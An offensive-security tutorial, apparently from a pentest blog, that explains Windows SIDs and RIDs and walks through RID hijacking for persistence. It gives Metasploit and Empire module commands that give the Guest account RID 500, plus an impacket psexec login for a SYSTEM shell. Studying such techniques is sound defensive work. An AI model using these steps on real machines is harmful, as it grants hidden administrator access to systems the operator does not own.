Persistence

Windows Persistence: RID Hijacking

by Raj

In this post, we will discuss RID hijacking, which is considered to be a persistence technique in terms of the cyber kill chain, and in this article, you will learn multiple ways to perform RID hijacking.

Table of Content

Introduction

  • FSMO roles
  • SID & RID
  • Syntax
  • Important Key points

RID-Hijacking

  • Metasploit
  • Empire

Introduction

Microsoft divided the responsibilities of a DC into FSMO roles that together make a full AD system. FSMO (Flexible Single Master Operation) has 5 responsibilities for forest and domain.

  • Schema Master (one per forest)
  • Domain Naming Master (one per forest)
  • Relative identifier (RID) Master (one per domain)
  • Primary Domain Controller (PDC) Emulator (one per domain)
  • Infrastructure Master (one per domain)

SID & RID

The RID is a Relative Identifier, which is the last part of SID (security identifier) and should be unique for a particular object within a domain. Each security principal has a unique SID that is issued by a security agent. The agent can be a Windows local system or a domain. The agent generates the SID when the security principal is created. The SID can be represented as a character string or as a structure.

Syntax

Syntax: S-[Revision]-[IdentifierAuthority]-[SubAuthority0]-[SubAuthority1]-…-[SubAuthority[SubAuthorityCount]](-RID)

Eg: S-1-5-21-1543651058-3042185658-368006193-1001

Windows Persistence using RID Hijacking

Important Key Points

  • The revision is always 1 for current NT versions.
  • When Windows establishes a new issuing authority, such as when someone deploys a new computer or creates a domain, it generates a Security Identifier (SID) with an identifier authority value of 5.
  • This constant serves as a base for all Windows SIDs. Additionally, we assign a fixed value of 21 for the root of this group of sub-authorities. After this, the system generates a 96-bit random number and divides it into three 32-bit chunks, each representing a sub-authority.
  • If a domain is the new issuing authority, we refer to the resulting SID as the SID domain.
  • In this context, Windows starts to allocate Relative Identifiers (RIDs) from 1,000 onwards. The system reserves RIDs with a value below 1,000 for special accounts.
  • For instance, their respective issuing authorities consider all Windows accounts with a RID of 500 to be built-in administrator accounts.

RID Hijacking

‘RID Hijacking’ is a tactic for an adversary to persist inside the victim’s system by hijacking the RID the Administrator account for the Guest account, or another local account. Creating persistence in the victim’s system allows an adversary to establish a foothold, continuously regaining access that will be unseen to you and allow to hijacker to logon as an authorized account which adversary has hijacked.

Thus, for this, you need to have privilege account session as we have in the below image, to establish persistence access.

Windows Persistence using RID Hijacking

Rid-Hijacking: Metasploit

So, as you know, we had meterperter session with admin privilege and Metasploit provides a module to create persistence in a victim’s machine by hijacking the RID of an administrator user.

This module creates an entry on the target by modifying the properties of an existing account. Specifically, it changes the account attributes by setting a Relative Identifier (RID), which must belong to an existing account on the destination machine. By exploiting certain integrity issues in Windows Local Users Management, this module allows authentication using the credentials of one known account (such as the GUEST account) while accessing the system with the privileges of another account (like the ADMINISTRATOR account), even if the spoofed account is disabled.

use post/windows/manage/rid_hijack
set getsystem true
set guest_account true
set session 2
set password 123
exploit

Once you run the exploit, it first checks the status of the GUEST account. If the account is disabled, it will activate it. After that, it will overwrite the RID value from 501 to 500, which is the RID value of the ADMINISTRATOR account.

As you’ve seen in the above step, the guest’s RID is 500 and the password is 123, so we logged in as a guest to get the CMD with Administrator privilege on the target machine. Here we are going to use the impacket tool to get the CMD shell of the remote machine.

cd /impacket/example
./psexec.py Guest:123@192.168.1.107

As you can observe that we have obtained CMD Shell as “nt authority /system” i.e CMD as an administrator account.

Windows Persistence using RID Hijacking

Rid-Hijacking: Empire

RID hijacking is also possible using Empire, you need to clone it module from GitHub.

git clone https://github.com/BC-SECURITY/Empire/

Once you finish the configuration, launch the module to start the attack; this will initialise just like Metasploit. First, identify the status of the guest account and then hijack RID =500 for guest user.

usemodule persistence/elevated/rid_hijack*
set UseGuest True
set Password 123
set Enable True
execute

Again repeat the above step to connect CMD of victim’s machine assure that you should have a privileged shell.

Windows Persistence using RID Hijacking

Reference

https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-azod/ecc7dfba-77e1-4e03-ab99-114b349c7164

To learn more about Windows Persistence. Follow this Link.

Author: Geet Madan is a Certified Ethical Hacker, Researcher and Technical Writer at Hacking Articles on Information SecurityContact here

Related posts:

Default ThumbnailWindows Persistence: COM Hijacking (MITRE: T1546.015) Default ThumbnailWindows Persistence: Shortcut Modification (T1547)